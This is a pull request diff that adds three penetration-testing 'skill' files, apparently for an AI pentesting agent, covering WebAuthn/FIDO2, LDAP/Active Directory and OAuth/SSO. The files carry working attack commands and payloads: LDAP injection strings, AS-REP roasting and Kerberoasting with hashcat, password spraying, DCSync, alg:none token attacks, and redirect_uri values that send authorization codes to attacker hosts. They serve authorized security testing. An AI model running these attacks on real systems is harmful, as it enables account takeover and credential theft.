### PR TITLE
feat(skills): identity & auth asset methodology skills

### DIFF
--- a/strix/skills/identity/fido2_webauthn.md
+++ b/strix/skills/identity/fido2_webauthn.md
@@ -1,0 +1,132 @@
+---
+name: fido2_webauthn
+description: Testing WebAuthn/FIDO2 registration and authentication ceremonies for origin binding, challenge replay, and fallback weaknesses.
+---
+
+# Hardware Key / FIDO2 (WebAuthn)
+
+A FIDO2 hardware key (YubiKey, Titan, passkey authenticator) is a phishing-resistant identifier: it signs a server-issued challenge with a private key that never leaves the device, and the browser binds that signature to the requesting origin. The asset under test is the full WebAuthn ceremony — the Relying Party (RP) server endpoints that issue challenges and verify attestation/assertion objects, plus every weaker authentication path the same account can fall back to. The attacker objective is to defeat that binding: replay or forge a signed assertion, register an attacker-controlled authenticator onto a victim account, downgrade to a weaker factor, or exploit RP server-side verification bugs so the cryptographic guarantee never actually gets enforced.
+
+## Attack Surface
+
+**Ceremony endpoints (the core RP API)**
+- Registration begin/finish: issues `PublicKeyCredentialCreationOptions`, then verifies the `attestationObject` + `clientDataJSON`. Common paths: `/webauthn/register/options`, `/attestation/begin`, `/u2f/register`.
+- Authentication begin/finish: issues `PublicKeyCredentialRequestOptions`, then verifies the `authenticatorData` + signature. Paths: `/webauthn/login/options`, `/assertion/begin`, `/mfa/verify`.
+- Credential management: list/rename/delete registered keys, set as MFA, mark "passwordless".
+
+**Configuration exposed to the client**
+- `rp.id` (RP ID), `challenge`, `user.id` (user handle), `pubKeyCredParams`, `attestation` (`none`/`indirect`/`direct`/`enterprise`), `authenticatorSelection` (`userVerification`, `residentKey`, `authenticatorAttachment`), `allowCredentials`/`excludeCredentials`, `timeout`.
+
+**Fallback and recovery paths (usually the real way in)**
+- Password-only login, TOTP/SMS/email OTP, recovery codes, "lost my key" account-recovery flows, magic links, legacy U2F endpoints kept alive alongside WebAuthn.
+- Step-up vs. login-time enforcement gaps: a session authenticated with password only may reach sensitive actions WebAuthn was meant to gate.
+
+## Recon & Enumeration
+
+```bash
+# Discover hosts/apps that speak WebAuthn
+subfinder -d target.tld -silent | httpx -silent -title -tech-detect -o hosts.txt
+katana -u https://target.tld -jc -d 3 -silent | grep -Ei 'webauthn|fido|u2f|passkey|attestation|assertion|mfa|2fa' | tee webauthn_urls.txt
+
+# Brute-force ceremony endpoints
+ffuf -w endpoints.txt -u https://target.tld/FUZZ -mc 200,400,401,403 \
+  -w <(printf '%s\n' webauthn/register/options webauthn/login/options attestation/begin \
+  assertion/begin u2f/register u2f/sign mfa/verify account/recovery passkey/options)
+
+# Pull the actual options object the RP issues (this is the spec under test)
+curl -s -X POST https://target.tld/webauthn/login/options \
+  -H 'Content-Type: application/json' -b cookies.txt \
+  -d '{"username":"victim@target.tld"}' | tee opts.json
+# Inspect challenge entropy, rp.id, userVerification, allowCredentials, timeout
+
+# Front-end WebAuthn config + library fingerprint (SimpleWebAuthn, webauthn-json, fido2-lib, py_webauthn)
+katana -u https://target.tld -silent | grep -Ei '\.js$' | httpx -silent -mr 'navigator.credentials|rp\.id|attestationObject|@simplewebauthn'
+
+# Known CVEs in WebAuthn libs / IdP MFA flows + TLS/origin sanity
+nuclei -u https://target.tld -tags webauthn,fido,mfa,auth,2fa -s critical,high,medium -j -o nuclei_fido.json
+nuclei -u https://target.tld -tags ssl,tls,cors -s high,medium -silent   # RP ID binding depends on TLS + origin
+
+# Source/secret review if RP code is in scope
+semgrep --config 'p/jwt' --config 'p/secrets' .
+trufflehog filesystem . --only-verified ; gitleaks detect -s . --no-banner
+```
+
+Asset-specific tooling to install when you need it:
+```bash
+pip install fido2 soft-webauthn          # scriptable virtual authenticator (register/assert programmatically)
+# Chrome DevTools "WebAuthn" tab or CDP WebAuthn domain → add a virtual authenticator, no hardware needed
+# jwt_tool for any JWT/session token the ceremony mints; interactsh-client for blind origin/SSRF callbacks
+```
+
+## Methodology
+
+1. **Map every account-access path**, not just WebAuthn. Enumerate password login, each OTP type, recovery codes, "lost key" flow, and legacy U2F. The weakest enabled path is the real attack surface — a perfect WebAuthn impl is moot if password+SMS still logs in.
+2. **Capture a full registration and a full authentication ceremony** through a proxy. Save `clientDataJSON`, `attestationObject`/`authenticatorData`, signature, challenge, and the begin/finish request pair.
+3. **Decode `clientDataJSON`** (base64url JSON): confirm `type`, `origin`, `challenge`, `crossOrigin`. This is what the RP must verify server-side; test each field.
+4. **Probe challenge lifecycle**: entropy, single-use, expiry, and binding to the session/user. Replay an old challenge; reuse a finished one; swap challenges between users.
+5. **Test origin and RP ID binding**: alter `origin` in `clientDataJSON`, alter `rp.id`, and test whether the RP accepts assertions minted for a parent/sibling domain.
+6. **Build a virtual authenticator** (soft-webauthn / Chrome CDP) and attempt to register it onto a victim account, or replay/forge assertions, since you control the signing key.
+7. **Attack the finish/verify step server-side**: signature verification skips, type confusion (`webauthn.get` vs `webauthn.create`), counter handling, user-handle confusion, attestation trust bypass.
+8. **Test downgrade/fallback** end to end: can you complete login or step-up without ever touching the registered key.
+9. **Probe credential management** for IDOR (delete/rename/add a key to another user's account) and self-service recovery abuse.
+
+## Key Weaknesses / Techniques
+
+- **Challenge replay / weak challenge.** RP reuses or doesn't expire challenges, or generates them with weak randomness (predictable, sequential, or short). Capture an assertion, let the session expire, replay the exact `finish` body. If accepted, the signed assertion is reusable.
+  ```bash
+  curl -s -X POST https://target.tld/webauthn/login/finish -b cookies.txt \
+    -H 'Content-Type: application/json' --data @captured_assertion.json    # replay verbatim
+  ```
+  Also try: request `login/options` twice and check the `challenge` differs and is high-entropy; submit `finish` with a challenge from a *different* `options` call.
+- **Origin not verified.** RP fails to check `clientDataJSON.origin` against an exact allowlist. Re-sign with a virtual authenticator while setting `origin` to `https://evil.target.tld`, `https://target.tld.evil.com`, or a subdomain. If the finish step accepts it, phishing resistance is gone.
+- **RP ID overscope / mismatch.** `rp.id` set to an eTLD+1 (e.g. `target.tld`) shared by untrusted subdomains, or accepting an `rp.id` the user-supplied options claimed. A credential registered on a sibling subdomain becomes usable against the sensitive one.
+- **`userVerification` not enforced.** Options request `userVerification:"required"` but the RP never checks the UV flag (bit `0x04`) in `authenticatorData`. Submit an assertion with UV unset — a stolen/idle key (no PIN/biometric) silently passes what should be 2-factor.
+- **Signature counter ignored.** Cloned/replayed authenticators are caught only if the RP enforces a monotonically increasing counter. Replay with an equal or lower counter; if accepted, clone detection is absent.
+- **Type confusion.** RP verifies `clientDataJSON.type` loosely. Submit a `webauthn.create` (registration) blob to the authentication finish endpoint, or vice versa, to bypass per-ceremony checks.
+- **User-handle / credential binding confusion.** Submit a valid assertion for *your* credential while naming the victim's `username`/`user.id`; if the RP resolves the account from the request body rather than from the credential's stored user handle, you authenticate as the victim.
+- **Attestation trust bypass / forged attestation.** RP requests `attestation:"direct"`/`enterprise` but accepts `none` or an unverified/self attestation. Register a fully software (forged) authenticator where genuine hardware was assumed, defeating device-binding/compliance controls.
+- **Registration without re-auth.** `/register/options` reachable with only a session cookie (no fresh step-up). Combined with session fixation/XSS/CSRF, attacker silently enrolls their own key as a persistent backdoor MFA factor.
+- **CSRF on ceremony endpoints.** Finish endpoints accept requests without CSRF token / `SameSite` protection, enabling forced registration or forced unenrollment.
+- **Fallback downgrade.** WebAuthn offered but password-only or weak OTP still completes the same login or step-up. Verify by simply not presenting an assertion and following the alternate path to the protected resource.
+
+## Validation
+
+- Drive ceremonies with a scriptable authenticator instead of hardware:
+  ```python
+  from soft_webauthn import SoftWebauthnDevice
+  dev = SoftWebauthnDevice(); dev.cred_init(rp_id='target.tld', user_handle=b'victim')
+  # produce attestation/assertion objects, mutate origin/challenge/UV flag, submit to finish endpoint
+  ```
+  Or use Chrome DevTools → WebAuthn → "Add virtual authenticator" and run the live flow; CDP exposes `WebAuthn.addCredential` for forced-registration PoCs.
+- For **replay**: show the same assertion body accepted twice (two HTTP 200 / two valid sessions) after challenge expiry.
+- For **origin/RP-ID**: show a finish request with a tampered `origin`/`rp.id` yielding a valid authenticated session.
+- For **UV/counter**: diff the decoded `authenticatorData` flags/counter against the options policy and show the RP issuing a session anyway.
+- For **fallback**: capture an authenticated session/cookie reaching the protected action with WebAuthn never invoked. Stop at proof — read a benign account-scoped resource, do not pivot further.
+
+## False Positives
+
+- A 200 from `*/finish` is not success — confirm an actual authenticated session/token was minted and grants access. Many RPs return 200 then reject downstream.
+- Browser/platform enforcement masking an RP bug: the browser refuses cross-origin/`rp.id` mismatches client-side, so a manual `curl` replay is required to prove the *server* doesn't check.
+- Challenges that look low-entropy but are HMAC/stateless and bound server-side — verify reuse is actually accepted, not just that the value is short.
+- "Missing attestation verification" when policy is intentionally `attestation:"none"` (privacy-preserving passkeys) — that is by design, not a finding.
+- OAST/origin callbacks whose source IP is the tester's browser, not the RP backend.
+- Counter staying 0 is normal for some platform authenticators/passkeys; only flag if the RP claims to enforce counters and accepts a *decrease*.
+
+## Chaining & Impact
+
+- Forced registration → attacker-owned key as permanent MFA → durable account takeover surviving password resets.
+- Origin/RP-ID bypass → phishing-resistant MFA defeated → credential phishing kits regain effectiveness against the org.
+- Fallback downgrade → MFA effectively optional → mass account takeover via password reuse / OTP phishing.
+- User-handle confusion or assertion replay → direct authentication as a victim → privilege escalation if the victim is an admin.
+- Self-service recovery abuse → bypass the key entirely → ATO without any WebAuthn interaction at all.
+- IDOR in credential management → unenroll a victim's only key → denial of access, or enroll your own → silent takeover.
+
+## Pro Tips
+
+1. The hardware key is rarely the weak link — the RP's server-side verification and the *other* enabled factors are. Enumerate every fallback before touching the ceremony.
+2. Always decode `clientDataJSON` and `authenticatorData` by hand; the RP's job is to validate fields most implementations only parse. Tamper one field per request to isolate which checks are missing.
+3. A virtual authenticator (soft-webauthn / Chrome CDP) is the whole test rig — you control the private key, so you can mint, mutate, and replay arbitrary attestation/assertion objects without hardware.
+4. Test the begin/finish pair as a stateful unit: mix-and-match a `finish` body with challenges/options from a different begin call, a different user, or a different ceremony type.
+5. Check whether `/register/options` requires fresh re-authentication — silent key enrollment is the highest-impact, most-overlooked WebAuthn bug.
+6. Confirm `rp.id` scope: a credential valid for `target.tld` covers every subdomain; one shared subdomain XSS can pivot into a passkey usable on the crown-jewel app.
+7. Passwordless ("first-factor") deployments raise the stakes — a single missing origin or challenge check is full account takeover, not just an MFA bypass.

--- a/strix/skills/identity/ldap_active_directory.md
+++ b/strix/skills/identity/ldap_active_directory.md
@@ -1,0 +1,177 @@
+---
+name: ldap_active_directory
+description: SSO/LDAP/AD assessment for anonymous binds, injection, directory enumeration, and credential-to-domain escalation.
+---
+
+# SSO / LDAP / Active Directory
+
+Directory services (OpenLDAP, 389-DS, Microsoft Active Directory, plus the SSO layers in front — Kerberos, ADFS, SAML/OIDC IdPs) are the identity backbone of an organization. A weakness here rarely stays local: an anonymous bind leaks the org chart and service accounts, an LDAP injection bypasses an application login, a single set of valid credentials enumerates the entire domain, and a misconfigured Kerberos/SSO flow yields tickets or assertions that impersonate any user. The attacker's objective is to move from unauthenticated network access to authenticated directory reads, then to credential material, then to domain-level control.
+
+## Attack Surface
+
+**Exposed services / ports**
+- LDAP `389/tcp`, LDAPS `636/tcp`, Global Catalog `3268/3269/tcp` (AD forest-wide)
+- Kerberos `88/tcp+udp`, kpasswd `464`, MS-RPC `135`, SMB `445`, WinRM `5985/5986`, LDAP-over-RPC `49152+`
+- DNS `53` (SRV records leak DCs), NetBIOS `137-139`
+- SSO/web front ends: ADFS (`/adfs/ls/`, `/adfs/services/trust`), SAML ACS endpoints, OIDC `/.well-known/openid-configuration`, Kerberos SPNEGO on `Authorization: Negotiate`
+
+**Application-layer surface**
+- App login forms / search boxes that build LDAP filters from user input (injection)
+- "Login with SSO" buttons → SAML/OIDC redirects (assertion/token tampering)
+- Self-service password reset, GAL/people-search, group-membership lookups
+- Service accounts with SPNs (Kerberoastable), pre-auth-disabled accounts (AS-REP roastable)
+
+## Recon & Enumeration
+
+Asset-specific tooling not always preinstalled:
+```bash
+# ldap utils, impacket, netexec, kerbrute
+apt-get install -y ldap-utils 2>/dev/null
+pipx install impacket || pip install impacket
+pipx install netexec        # nxc (successor to crackmapexec)
+go install github.com/ropnop/kerbrute@latest
+```
+
+**Service discovery**
+```bash
+naabu -host dc.target.tld -p 88,135,139,389,445,464,636,3268,3269,5985 -silent
+nmap -Pn -p 389,636,3268,3269 --script "ldap-rootdse,ldap-search,ssl-cert" dc.target.tld
+# DNS leaks the domain controllers without touching them
+dnsx -d target.tld -srv -resp -silent <<< "_ldap._tcp.dc._msdcs.target.tld
+_kerberos._tcp.target.tld"
+```
+
+**RootDSE (no credentials needed)** — reveals naming contexts, domain FQDN, functional level:
+```bash
+ldapsearch -x -H ldap://dc.target.tld -s base -b "" "(objectclass=*)" "*" +
+```
+
+**Anonymous bind enumeration** — if allowed, dump users/groups/computers:
+```bash
+ldapsearch -x -H ldap://dc.target.tld -b "DC=target,DC=tld" "(objectClass=user)" \
+  sAMAccountName description memberOf userAccountControl
+nxc ldap dc.target.tld -u '' -p '' --users          # anonymous
+nxc smb  dc.target.tld -u '' -p '' --shares --pass-pol
+```
+
+**Username harvesting (pre-auth, low noise)** — Kerberos tells you which names exist:
+```bash
+kerbrute userenum -d target.tld --dc dc.target.tld users.txt
+```
+
+**SSO endpoints**
+```bash
+httpx -l hosts.txt -path /.well-known/openid-configuration,/adfs/ls/IdpInitiatedSignon.aspx -mc 200 -title
+nuclei -u https://sso.target.tld -tags adfs,saml,oidc,ldap -s critical,high,medium -silent
+katana -u https://app.target.tld -jc | grep -Ei 'saml|sso|oauth|oidc|adfs|/login'
+```
+
+## Methodology
+
+1. **Map the directory perimeter.** naabu/nmap for 389/636/88/445/3268; resolve DC SRV records with dnsx. Pull RootDSE to confirm the base DN and whether it's AD vs OpenLDAP.
+2. **Test anonymous access first.** Empty-credential bind + Global Catalog (3268) search. Capture every `description`/`info`/`comment` attribute — passwords live there far too often.
+3. **Harvest usernames** via kerbrute userenum and any anonymous user dump; build `users.txt` for spraying and roasting.
+4. **AS-REP roast** accounts with `DONT_REQ_PREAUTH` (no creds required). Crack offline.
+5. **Acquire one credential** — careful low-rate spray (honor lockout policy from `--pass-pol`), or crack an AS-REP/Kerberoast hash.
+6. **Authenticated enumeration.** With any valid account, run BloodHound collection (nxc/bloodhound-python) and Kerberoast all SPN accounts.
+7. **Application LDAP injection.** Independently, fuzz every app login/search that talks to the directory for filter injection and auth bypass.
+8. **SSO flow analysis.** Decode SAML assertions / OIDC tokens; test signature stripping, audience/issuer confusion, and replay.
+9. **Plan escalation paths** from BloodHound (ACL abuse, delegation, GPO) toward Domain Admin / forest trust.
+
+## Key Weaknesses / Techniques
+
+### Anonymous / unauthenticated bind
+OpenLDAP `olcDisallows` not set, or AD `dsHeuristics` permitting anonymous reads. Confirm with the empty-bind `ldapsearch` above. Even read-only anonymous access leaks `userAccountControl` flags (find disabled-preauth and never-expire accounts) and cleartext secrets in `description`.
+
+### LDAP injection (application auth bypass)
+App builds a filter like `(&(uid=$user)(password=$pass))`. Inject filter metacharacters:
+```
+# username field — close uid, force objectClass=* match, comment-out the rest
+*)(uid=*))(|(uid=*
+# always-true wildcard
+*)(|(objectClass=*
+# auth bypass: make password clause irrelevant
+admin)(|(password=*
+```
+Blind/boolean injection to exfiltrate attributes char-by-char:
+```
+admin)(|(description=A*   → true/false oracle on first char
+```
+Automate the fuzz with ffuf against the form parameter and a filter-meta wordlist, diffing response length:
+```bash
+ffuf -u https://app.target.tld/login -X POST -d 'user=FUZZ&pass=x' \
+  -H 'Content-Type: application/x-www-form-urlencoded' \
+  -w ldap_inject.txt -mode clusterbomb -fr 'invalid' -ac
+```
+
+### AS-REP roasting (no creds)
+```bash
+impacket-GetNPUsers target.tld/ -usersfile users.txt -dc-ip <dc> -no-pass -format hashcat -outputfile asrep.hash
+hashcat -m 18200 asrep.hash rockyou.txt
+```
+
+### Kerberoasting (one valid cred)
+```bash
+impacket-GetUserSPNs target.tld/user:pass -dc-ip <dc> -request -outputfile spn.hash
+nxc ldap dc.target.tld -u user -p pass --kerberoasting kerb.out
+hashcat -m 13100 spn.hash rockyou.txt
+```
+
+### Password spraying (lockout-aware)
+```bash
+nxc smb dc.target.tld -u users.txt -p 'Season2026!' --continue-on-success
+# one password per round, wait out the observation window between rounds
+```
+
+### LDAPS / channel-binding & signing
+AD not enforcing LDAP signing / channel binding → NTLM relay to LDAP for object creation or RBCD. Probe:
+```bash
+nxc ldap dc.target.tld -u user -p pass -M ldap-checker
+```
+
+### SSO assertion / token abuse
+- SAML: decode the `SAMLResponse` (base64+inflate), attempt **signature stripping** (remove `<Signature>`), XML signature wrapping, and `NameID` swapping to another user; replay within validity window.
+- OIDC/JWT: check `alg:none`, weak HMAC secret, `kid` injection, and audience/issuer confusion across multiple RPs.
+```bash
+jwt_tool <token> -M at        # all attacks incl. alg confusion
+jwt_tool <token> -X a         # alg:none
+```
+- ADFS: legacy IdP-initiated sign-on and `wctx`/`wreply` open-redirect / token-replay weaknesses.
+
+## Validation
+
+- **Anonymous bind:** show a successful empty-credential `ldapsearch` returning real user objects (redact secrets). The bind succeeding with `-x` and no `-D`/`-w` is the proof.
+- **LDAP injection:** demonstrate authenticating with no valid password, or extract one out-of-band attribute via the boolean oracle, with the exact request/response diff.
+- **Roasting:** crack at least one hash to a plaintext and confirm it binds (`nxc smb ... -u <u> -p <cracked>` → `[+]`). Cracking proves real impact; the hash alone does not.
+- **SSO bypass:** present a forged assertion/token that the SP accepts (authenticated session as a different principal) — capture the post-login authenticated request.
+- Always re-run the PoC to confirm determinism and record exact base DN, filter, and endpoint.
+
+## False Positives
+
+- "Anonymous bind succeeds" but returns **zero objects** — RootDSE base reads are allowed by design; that is not a leak unless directory objects come back.
+- LDAP filter metacharacters that error out (`invalid filter`) without changing auth outcome — input reaching the filter is not the same as a bypass; require a behavioral change.
+- Kerberoast/AS-REP hashes that never crack — uncracked = no demonstrated impact, report as informational at most.
+- `userAccountControl` "password never expires" alone is a hygiene note, not a vuln.
+- SAML `alg:none` accepted by a decoder you control but **rejected by the actual SP** — only the SP's acceptance counts.
+- Spray "valid" hits that are honeypot/canary accounts (no group membership, recently created) — verify with a real authenticated action.
+
+## Chaining & Impact
+
+- Anonymous bind → cleartext password in `description` → valid domain credential → Kerberoast → crack service account → its ACLs/SPN privileges.
+- One low-priv cred → BloodHound → ACL/GPO/delegation path (e.g., `GenericWrite` on a user, RBCD via unconstrained/constrained delegation) → Domain Admin.
+- LDAP signing off → NTLM relay to LDAP → add machine account + configure RBCD → DCSync.
+- DCSync (`impacket-secretsdump -just-dc target.tld/da:pass@dc`) → krbtgt hash → Golden Ticket → persistent forest-wide impersonation.
+- SAML/ADFS key compromise or signature bypass → forge assertions for any user (Golden SAML) → SSO into every federated app (cloud included) without touching the DC.
+- Forest trust abuse: child-domain compromise → SID history / inter-realm TGT → parent domain.
+
+## Pro Tips
+
+1. Query the **Global Catalog (3268)** instead of 389 — it returns forest-wide objects and is frequently less monitored.
+2. Grep every directory dump for secrets in metadata: `description`, `info`, `comment`, `userPassword`, `unixUserPassword`, and AD LAPS `ms-Mcs-AdmPwd`.
+3. Always pull `--pass-pol` before spraying; one wrong round can lock hundreds of accounts and burn the engagement.
+4. AS-REP roasting needs **no credentials** — run it the moment you have a username list; it is the cheapest path to a first cred.
+5. Prefer Kerberos auth (`-k`) over NTLM with impacket/nxc when signing is enforced; it sidesteps several hardening controls.
+6. For LDAP injection, the highest-value sink is the login filter, but people-search and group-lookup endpoints often have laxer filtering and richer attribute returns.
+7. Decode SAML with `python3 -c 'import base64,zlib,sys;print(zlib.decompress(base64.b64decode(sys.argv[1]),-15))'` — redirect-binding assertions are deflate-compressed.
+8. trufflehog/gitleaks the org's repos for hardcoded bind DNs and service-account passwords before you ever touch the DC — config files leak `BIND_DN`/`LDAP_PASSWORD` constantly.
+9. Keep all directory reads scoped and rate-limited; mass GC sweeps trip directory-service auditing fast.

--- a/strix/skills/identity/oauth_sso.md
+++ b/strix/skills/identity/oauth_sso.md
@@ -1,0 +1,166 @@
+---
+name: oauth_sso
+description: OAuth2/OIDC and SSO testing for redirect_uri abuse, state/PKCE flaws, token leakage, and account takeover
+---
+
+# OAuth / SSO Provider
+
+An OAuth2 authorization server or OIDC/SSO provider brokers identity between users, identity providers (IdPs), and relying-party clients (the "consumers" / service providers). The attacker's objective is to steal authorization codes or tokens, forge or replay them, or abuse loose flow validation (redirect_uri, state, PKCE, response_type) to authenticate as another user, pivot a token issued for one client into another, or escalate scope — culminating in account takeover. This skill covers the *flow and trust* layer; for raw token signature/claim forgery see the JWT/OIDC skill.
+
+## Attack Surface
+
+**Authorization-server endpoints**
+- `/authorize`, `/oauth2/authorize` — front-channel; consumes `client_id`, `redirect_uri`, `response_type`, `scope`, `state`, `nonce`, `code_challenge`
+- `/token`, `/oauth2/token` — back-channel code/refresh exchange
+- `/.well-known/openid-configuration`, `/.well-known/oauth-authorization-server` — full endpoint + capability map
+- `/jwks.json`, `/keys` — signing keys
+- `/userinfo`, `/introspect`, `/revoke`, `/logout`, `/connect/endsession`, device-code endpoints
+- Dynamic client registration: `/register`, `/connect/register`
+
+**Relying-party (client) endpoints**
+- `/callback`, `/oauth/callback`, `/auth/<provider>/callback`, `/signin-oidc`, `/login/oauth2/code/<provider>`
+- "Login with Google/GitHub/Microsoft/Apple" buttons, account-linking flows, SAML ACS endpoints
+
+**Exposed values**
+- `redirect_uri` allowlist behavior, `state`/`nonce` generation, PKCE method (`S256` vs `plain` vs absent)
+- Issued access/ID/refresh tokens, their `aud`/`azp`/`scope`/`exp`, and where the client stores them (cookie, localStorage, fragment)
+- Implicit-flow leakage via URL fragment and Referer headers
+
+## Recon & Enumeration
+
+```bash
+# Resolve + probe the provider/client hosts
+subfinder -d target.tld -silent | httpx -silent -title -tech-detect -sc -o hosts.txt
+
+# Pull the OIDC/OAuth discovery document — the source of truth for endpoints + supported features
+curl -s https://target.tld/.well-known/openid-configuration | jq .
+curl -s https://target.tld/.well-known/oauth-authorization-server | jq .
+# Note: authorization_endpoint, token_endpoint, jwks_uri, response_types_supported,
+#       code_challenge_methods_supported, grant_types_supported, scopes_supported
+
+# Inspect signing keys (feeds JWT forgery: kty/alg/kid)
+curl -s "$(curl -s https://target.tld/.well-known/openid-configuration | jq -r .jwks_uri)" | jq .
+
+# Discover client callback paths and login buttons
+katana -u https://app.target.tld -jc -d 3 -silent | grep -Ei 'callback|oauth|signin-oidc|/auth/|redirect_uri|client_id' | sort -u
+ffuf -u https://app.target.tld/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt \
+  -mc 200,301,302,401,403 -fs 0 | grep -Ei 'callback|oauth|sso|login|logout'
+
+# Tech/CVE sweep of the provider (Keycloak/Auth0/Okta/Cognito/IdentityServer have known CVEs)
+nuclei -u https://target.tld -tags oauth,oidc,saml,jwt,exposure -s critical,high,medium -silent -j -o nuclei_oauth.jsonl
+nuclei -u https://target.tld -as -s critical,high -rl 50 -c 20 -timeout 10 -retries 1 -silent
+
+# OAST oracle for blind redirect/SSRF exfil (jku/x5u fetch, redirect_uri to attacker)
+interactsh-client -v    # yields a fresh *.oast.fun domain to embed in redirect_uri
+
+# Token signature/claim attack matrix once you hold a token
+jwt_tool -t https://api.target.tld/me -rh "Authorization: Bearer <token>" -M at
+```
+
+Asset-specific helpers to install when needed:
+- `pipx install saml2-burp` or use `python3 -m pip install python3-saml` for SAML signature-wrapping tests; `xmlsec1` for canonicalization checks.
+- Burp Suite extensions (when a proxy is in scope): `OAuth Scan`, `JWT Editor`, `SAML Raider` for in-flow tampering.
+- `npm i -g oauth2-mock-server` / a local listener (`python3 -m http.server`) to act as a rogue client or IdP when testing trust boundaries.
+
+## Methodology
+
+1. **Map the topology.** From discovery docs, decide: is the target the *authorization server*, the *relying-party client*, or both? Identify every `client_id`, every registered `redirect_uri`, and which flow each login uses (auth code, code+PKCE, implicit, hybrid, device).
+2. **Capture a clean flow.** Walk a full login as a low-priv user, recording the `/authorize` request, the redirect with `code`/`state`, and the `/token` exchange. This baseline reveals which params are validated.
+3. **Probe redirect_uri validation.** Mutate `redirect_uri` (see Techniques) and observe whether the server still issues a code/token to a non-canonical destination.
+4. **Test state/nonce.** Remove or reuse `state`; replay a flow with a victim-chosen `state` to assess login CSRF and code-fixation.
+5. **Test PKCE.** Downgrade `S256`→`plain`, omit `code_challenge`, or reuse/omit `code_verifier` at `/token`.
+6. **Test token handling.** Exchange a code twice; replay across clients; swap ID token for access token; check `scope`/`aud`/`azp` enforcement at resource servers.
+7. **Test account linking & IdP trust.** Attempt to link an attacker IdP identity (unverified email, mismatched `sub`) to a victim local account.
+8. **Test logout/refresh.** Confirm revocation actually invalidates refresh tokens and sessions; test refresh reuse without rotation detection.
+9. **Validate, PoC, escalate.** Convert any leaked code/token into a concrete cross-account or cross-client access proof.
+
+## Key Weaknesses / Techniques
+
+### redirect_uri validation flaws
+The single richest OAuth bug class — a loose redirect lets you steal the code/token.
+```
+# Open redirect / allowlist bypass variants (one per request, observe if a code is issued):
+redirect_uri=https://attacker.oast.fun/cb
+redirect_uri=https://app.target.tld.attacker.oast.fun/cb     # suffix not anchored
+redirect_uri=https://app.target.tld@attacker.oast.fun/cb     # userinfo confusion
+redirect_uri=https://attacker.oast.fun#@app.target.tld/cb    # fragment confusion
+redirect_uri=https://app.target.tld/cb/../../redirect?u=//attacker.oast.fun  # path traversal + chained open redirect
+redirect_uri=https://app.target.tld/cb%2f%2e%2e%2fattacker   # encoded traversal
+redirect_uri=https://app.target.tld.evil.com                 # subdomain/regex anchor gap
+redirect_uri=https://app.target.tld/cb?next=//attacker.oast.fun  # extra param smuggle
+redirect_uri=//attacker.oast.fun                             # scheme-relative
+```
+If only the *registered* prefix is checked, append `/../` or an open redirect on the legit host. If a wildcard subdomain is registered (`https://*.target.tld/cb`), take over or register any subdomain. For mobile, custom-scheme `redirect_uri` (`com.app://cb`) can be claimed by a malicious app.
+
+### state / CSRF & code fixation
+- **Missing/unvalidated `state`** → login CSRF: craft an `/authorize` link, deliver to victim; their session links to an attacker-controlled IdP account, or you fixate a code. Verify by removing `state` and confirming `/callback` still completes.
+- **Predictable `state`** (timestamp, sequential, reflected verbatim) → forge a victim-targeted callback.
+
+### PKCE downgrade / bypass
+```
+# At /authorize:  drop code_challenge entirely, or send method=plain
+code_challenge=attacker_known&code_challenge_method=plain
+# At /token: if server doesn't bind verifier, a stolen code (e.g. via redirect leak)
+# can be redeemed without the original code_verifier:
+curl -s -X POST https://target.tld/oauth2/token \
+  -d grant_type=authorization_code -d code=<stolen> \
+  -d redirect_uri=https://app.target.tld/cb -d client_id=<client>
+```
+If the auth server advertises only `S256` in `code_challenge_methods_supported` but still accepts `plain` or a missing verifier, PKCE protection is void.
+
+### code/token replay & cross-client confusion
+- **Code reuse:** redeem the same `code` twice at `/token`. A second success = no single-use enforcement.
+- **Client mix-up (IdP confusion):** capture a code issued for Client A and redeem it at Client B's `/token` with B's `client_id`; if `aud`/`client_id` binding is weak, you get a token for B.
+- **Token swap:** present an ID token where an access token is expected (and vice versa) at resource servers that only verify signature, not `typ`/`aud`/`azp`.
+
+### scope / consent escalation
+- Add high-value scopes (`admin`, `offline_access`, `*`) to `/authorize` and check if granted silently without re-consent.
+- Downgrade-then-upgrade: get consent for a narrow scope, then request a broader scope at refresh time.
+
+### account linking / IdP email-trust abuse
+- Register an attacker IdP identity with the victim's email; if the relying party links accounts by **email alone** (ignoring verified-email claim or `sub`), logging in with the attacker IdP grants the victim's local account.
+- Pre-account-takeover: create a local account with the victim's email *before* they sign up via SSO; the SSO login may merge into your account.
+
+### implicit-flow & fragment leakage
+- For `response_type=token`/`id_token`, the token lands in the URL fragment — leaks via Referer, browser history, open redirects, and third-party JS. Force implicit on a server that also supports it and chain with an open redirect.
+
+### SAML SSO (when federation uses SAML)
+- XML signature wrapping (XSW), `SignatureValue` stripping on IdP-initiated SSO, comment-truncation in `NameID` (`admin@x.com<!---->.evil.com`), and unsigned-assertion acceptance. Use SAML Raider / `python3-saml` to mutate and resubmit at the ACS.
+
+## Validation
+
+1. **Redirect leak:** show that submitting your mutated `redirect_uri` causes the authorization server to deliver a real `code`/`token` to your `*.oast.fun` listener (capture the inbound request in `interactsh-client`). Then redeem that code at `/token` and call `/userinfo` to prove it is a *victim-context* credential.
+2. **PKCE/state bypass:** demonstrate a complete login that succeeds with `state` removed or with a stolen code redeemed without the matching `code_verifier`.
+3. **Cross-account:** with two test identities, complete an attacker-initiated flow that yields access to the *other* account's `/userinfo` / protected resource — identical requests differing only in the manipulated flow parameter.
+4. **Cross-client/token swap:** show a token minted for Client A or an ID token being accepted by Client B / an access-only API.
+5. Confirm reproducibility and record the exact `/authorize` and `/token` parameters (`client_id`, `redirect_uri`, `response_type`, `state`, `code_challenge*`) that control the outcome. Keep PoCs minimal — read one harmless owner-only field, do not pivot further than needed to prove impact.
+
+## False Positives
+
+- `redirect_uri` reflected in an error page but the server returns an `invalid_redirect_uri` error and **never issues a code** — no leak.
+- An OAST hit whose source IP is your own browser/test box (a client-side fetch made it), not the authorization server.
+- "Missing `state`" where the framework substitutes PKCE + same-site session cookies for CSRF protection and the flow can't be cross-initiated.
+- ID-token-as-access-token "accepted" by an endpoint that re-validates `aud`/`typ` and ultimately returns 401/403.
+- Code "reuse" that succeeds only within a sanctioned idempotency window and returns the *same* token, not a fresh one.
+- Account-link by email where the provider enforces a `email_verified:true` claim and matching `sub` — not exploitable.
+- Wildcard/regex `redirect_uri` matches that still require a host you cannot register or control.
+
+## Chaining & Impact
+
+- Loose `redirect_uri` + open redirect on a legit host → authorization-code theft → `/token` exchange → **full account takeover** of any user who clicks the crafted login link.
